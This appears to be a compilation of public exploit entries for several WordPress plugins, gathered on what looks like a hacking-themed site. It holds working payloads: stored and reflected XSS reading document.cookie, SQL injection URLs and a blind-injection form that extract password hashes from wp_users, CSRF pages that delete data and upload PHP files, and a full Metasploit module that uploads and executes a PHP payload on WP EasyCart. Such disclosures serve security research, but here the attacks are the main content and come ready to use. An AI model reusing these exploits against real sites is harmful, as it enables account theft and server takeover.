# Date: 22/6/2021
# Exploit Author: Mohammed Adam
# Vendor Homepage: https://www.wpgmaps.com/
# Software Link: https://wordpress.org/plugins/wp-google-maps/
# Version: 5.7.2
# Tested on: Windows 10
# CVE: CVE-2021-24383
# References link: https://wpscan.com/vulnerability/1270588c-53fe-447e-b83c-1b877dc7a954

*Proof of Concept*

*Steps to Reproduce:*

1) Edit a map (e.g
/wp-admin/admin.php?page=wp-google-maps-menu&action=edit&map_id=1)

2) Change Map Name to <script>alert(document.cookie)</script>

3) Save the Map

4) Stored XSS will be triggered when viewing the Map List
(/wp-admin/admin.php?page=wp-google-maps-menu)
HireHackking 
source: https://www.securityfocus.com/bid/53530/info

WP Forum Server plugin for WordPress is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

WP Forum Server 1.7.3 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.php&amp;vasthtml_action=structure&amp;do=addforum&amp;groupid=%27%3E%3Cscript%3Ealert%281%29%3C/script%3E

http://www.example.com/wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.php&amp;vasthtml_action=structure&amp;do=editgroup&amp;groupid='&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt;

http://www.example.com/wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.php&amp;vasthtml_action=structure&amp;do=editgroup&amp;groupid=2 AND 1=0 UNION SELECT user_pass FROM wp_users WHERE ID=1

http://www.example.com/wp-admin/admin.php?page=forum-server/fs-admin/fs-admin.php&amp;vasthtml_action=usergroups&amp;do=edit_usergroup&amp;usergroup_id='&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt;
HireHackking 
source: https://www.securityfocus.com/bid/60904/info

WP Feed plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/wp-content/plugins/feed/news_dt.php?nid=[Sql]
HireHackking 
# Exploit Title: WP Fastest Cache 0.8.4.8 Blind SQL Injection
# Date: 11-11-2015
# Software Link: https://wordpress.org/plugins/wp-fastest-cache/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
 
1. Description
   
For this vulnerabilities also WP-Polls needs to be installed.

Everyone can access wpfc_wppolls_ajax_request().

$_POST["poll_id"] is not escaped properly.

File: wp-fastest-cache\inc\wp-polls.php

public function wpfc_wppolls_ajax_request() {
	$id = strip_tags($_POST["poll_id"]);
	$id = mysql_real_escape_string($id);

	$result = check_voted($id);

	if($result){
		echo "true";
	}else{
		echo "false";
	}
	die();
}

http://security.szurek.pl/wp-fastest-cache-0848-blind-sql-injection.html

2. Proof of Concept

<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wpfc_wppolls_ajax_request">
	<input type="text" name="poll_id" value="0 UNION (SELECT IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM `wp_users` WHERE ID = 1) -- ">
	<input type="submit" value="Send">
</form>

3. Solution:
   
Update to version 0.8.4.9
HireHackking 
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  include Msf::HTTP::Wordpress

  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'WordPress WP EasyCart Unrestricted File Upload',
      'Description'     => %q{WordPress Shopping Cart (WP EasyCart) Plugin for
                              WordPress contains a flaw that allows a remote
                              attacker to execute arbitrary PHP code. This
                              flaw exists because the
                              /inc/amfphp/administration/banneruploaderscript.php
                              script does not properly verify or sanitize
                              user-uploaded files. By uploading a .php file,
                              the remote system will place the file in a
                              user-accessible path. Making a direct request to
                              the uploaded file will allow the attacker to
                              execute the script with the privileges of the web
                              server.

                              In versions <= 3.0.8 authentication can be done by
                              using the WordPress credentials of a user with any
                              role. In later versions, a valid EasyCart admin
                              password will be required that is in use by any
                              admin user. A default installation of EasyCart will
                              setup a user called "demouser" with a preset password
                              of "demouser".},
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Kacper Szurek',                  # Vulnerability disclosure
          'Rob Carr <rob[at]rastating.com>' # Metasploit module
        ],
      'References'      =>
        [
          ['OSVDB', '116806'],
          ['WPVDB', '7745']
        ],
      'DisclosureDate'  => 'Jan 08 2015',
      'Platform'        => 'php',
      'Arch'            => ARCH_PHP,
      'Targets'         => [['wp-easycart', {}]],
      'DefaultTarget'   => 0
    ))

    register_options(
      [
        OptString.new('USERNAME', [false, 'The WordPress username to authenticate with (versions <= 3.0.8)']),
        OptString.new('PASSWORD', [false, 'The WordPress password to authenticate with (versions <= 3.0.8)']),
        OptString.new('EC_PASSWORD', [false, 'The EasyCart password to authenticate with (versions <= 3.0.18)', 'demouser']),
        OptBool.new('EC_PASSWORD_IS_HASH', [false, 'Indicates whether or not EC_PASSWORD is an MD5 hash', false])
      ], self.class)
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  def ec_password
    datastore['EC_PASSWORD']
  end

  def ec_password_is_hash
    datastore['EC_PASSWORD_IS_HASH']
  end

  def use_wordpress_authentication
    username.to_s != '' && password.to_s != ''
  end

  def use_ec_authentication
    ec_password.to_s != ''
  end

  def req_id
    if ec_password_is_hash
      return ec_password
    else
      return Rex::Text.md5(ec_password)
    end
  end

  def generate_mime_message(payload, date_hash, name, include_req_id)
    data = Rex::MIME::Message.new
    data.add_part(date_hash, nil, nil, 'form-data; name="datemd5"')
    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"Filedata\"; filename=\"#{name}\"")
    data.add_part(req_id, nil, nil, 'form-data; name="reqID"') if include_req_id
    data
  end

  def setup
    if !use_wordpress_authentication && !use_ec_authentication
      fail_with(Failure::BadConfig, 'You must set either the USERNAME and PASSWORD options or specify an EC_PASSWORD value')
    end

    super
  end

  def exploit
    vprint_status("#{peer} - WordPress authentication attack is enabled") if use_wordpress_authentication
    vprint_status("#{peer} - EC authentication attack is enabled") if use_ec_authentication

    if use_wordpress_authentication && use_ec_authentication
      print_status("#{peer} - Both EasyCart and WordPress credentials were supplied, attempting WordPress first...")
    end

    if use_wordpress_authentication
      print_status("#{peer} - Authenticating using #{username}:#{password}...")
      cookie = wordpress_login(username, password)

      if !cookie
        if use_ec_authentication
          print_warning("#{peer} - Failed to authenticate with WordPress, attempting upload with EC password next...")
        else
          fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress')
        end
      else
        print_good("#{peer} - Authenticated with WordPress")
      end
    end

    print_status("#{peer} - Preparing payload...")
    payload_name = Rex::Text.rand_text_alpha(10)
    date_hash = Rex::Text.md5(Time.now.to_s)
    uploaded_filename = "#{payload_name}_#{date_hash}.php"
    plugin_url = normalize_uri(wordpress_url_plugins, 'wp-easycart')
    uploader_url = normalize_uri(plugin_url, 'inc', 'amfphp', 'administration', 'banneruploaderscript.php')
    payload_url = normalize_uri(plugin_url, 'products', 'banners', uploaded_filename)
    data = generate_mime_message(payload, date_hash, "#{payload_name}.php", use_ec_authentication)

    print_status("#{peer} - Uploading payload to #{payload_url}")
    res = send_request_cgi(
      'method'  => 'POST',
      'uri'     => uploader_url,
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => data.to_s,
      'cookie'  => cookie
    )

    fail_with(Failure::Unreachable, 'No response from the target') if res.nil?
    vprint_error("#{peer} - Server responded with status code #{res.code}") if res.code != 200

    print_status("#{peer} - Executing the payload...")
    register_files_for_cleanup(uploaded_filename)
    res = send_request_cgi(
    {
      'uri'     => payload_url,
      'method'  => 'GET'
    }, 5)

    if !res.nil? && res.code == 404
      print_error("#{peer} - Failed to upload the payload")
    else
      print_good("#{peer} - Executed payload")
    end
  end
end
HireHackking 
# Exploit Title: Wordpress WP Easy Slideshow Plugin Multiple Vulnerabilities
# Google Dork: inurl:/wp-content/uploads/wp-easy-slideshow/
# Date: 2 April 2015
# Exploit Author: Divya
# Vendor Homepage: https://wordpress.org/plugins/wp-easy-slideshow/
# Software Link: https://downloads.wordpress.org/plugin/wp-easy-slideshow.zip
# Version: 1.0.3
# Tested on: Windows, Linux
# CVE : None

Delete operation using CSRF:

<img src="http://192.168.1.2/wp-admin/admin.php?page=wss-images&del_id=[number]">
Example: http://192.168.1.2/wp-admin/admin.php?page=wss-images&del_id=1

<html>
  <head><title>CSRF Delete Operation</title></head>
  <body>
    <form action="http://192.168.1.2/wp-admin/admin.php">
      <input type="hidden" name="page" value="wss-images" />
      <input type="hidden" name="del_id" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


Arbitrary File Upload using CSRF:

<html>
  <head><title>WP CSRF File Upload</title></head>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://localhost/wordpress/wp-admin/admin.php?page=wss-add-image", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1559691976562");
        xhr.withCredentials = true;
        var body = "-----------------------------1559691976562\r\n" + 
          "Content-Disposition: form-data; name=\"wss_image\"; filename=\"myfile.php\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "\x3c?php\r\n" + 
          "phpinfo();\r\n" + 
          "?\x3e\r\n" + 
          "-----------------------------1559691976562\r\n" + 
          "Content-Disposition: form-data; name=\"desc_content\"\r\n" + 
          "\r\n" + 
          "CSRF File Upload\r\n" + 
          "-----------------------------1559691976562\r\n" + 
          "Content-Disposition: form-data; name=\"image_link\"\r\n" + 
          "\r\n" + 
          "linkData\r\n" + 
          "-----------------------------1559691976562\r\n" + 
          "Content-Disposition: form-data; name=\"submit\"\r\n" + 
          "\r\n" + 
          "Submit\r\n" + 
          "-----------------------------1559691976562--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>


Arbitrary File Upload (Authenticated):

URL: http://192.168.1.2/wp-admin/admin.php?page=wss-add-image

The upload script allows uploading arbitrary files. The files are renamed to numbers like 1,2,3,... The uploaded files cannot be executed on server.

Upload Location: http://192.168.1.2/wp-content/uploads/wp-easy-slideshow/